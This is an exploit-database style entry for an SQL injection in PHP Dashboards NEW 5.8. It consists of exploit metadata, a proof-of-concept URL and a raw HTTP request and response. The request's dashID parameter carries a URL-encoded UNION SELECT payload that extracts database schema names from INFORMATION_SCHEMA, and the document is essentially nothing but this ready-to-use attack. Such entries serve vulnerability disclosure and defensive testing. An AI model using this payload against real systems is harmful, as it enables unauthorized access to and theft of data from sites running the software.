37 lines
No EOL
1.5 KiB
Text
37 lines
No EOL
1.5 KiB
Text
# Exploit Title: PHP Dashboards NEW 5.8 - SQL Injection
|
|
# Dork: N/A
|
|
# Date: 2019-01-21
|
|
# Exploit Author: Ihsan Sencan
|
|
# Vendor Homepage: http://dataninja.biz
|
|
# Software Link: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104
|
|
# Version: 5.8
|
|
# Category: Webapps
|
|
# Tested on: WiN7_x64/KaLiLinuX_x64
|
|
# CVE: N/A
|
|
|
|
# POC:
|
|
# 1)
|
|
# http://localhost/[PATH]/php/save/savedescriptions.php?dashID=[SQL]
|
|
#
|
|
|
|
GET /[PATH]/php/save/savedescriptions.php?dashID=%2d%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%73%63%68%65%6d%61%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%53%43%48%45%4d%41%54%41%29%2c%31%31%2d%2d%20%2d HTTP/1.1
|
|
Host: TARGET
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
|
|
DNT: 1
|
|
Connection: keep-alive
|
|
Upgrade-Insecure-Requests: 1
|
|
HTTP/1.1 200 OK
|
|
Server: nginx
|
|
Date: Sun, 20 Jan 2019 21:08:05 GMT
|
|
Content-Type: text/html; charset=UTF-8
|
|
Transfer-Encoding: chunked
|
|
Connection: keep-alive
|
|
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
|
Cache-Control: no-store, no-cache, must-revalidate
|
|
Pragma: no-cache
|
|
Host-Header: 192fc2e7e50945beb8231a492d6a8024
|
|
X-Proxy-Cache: MISS |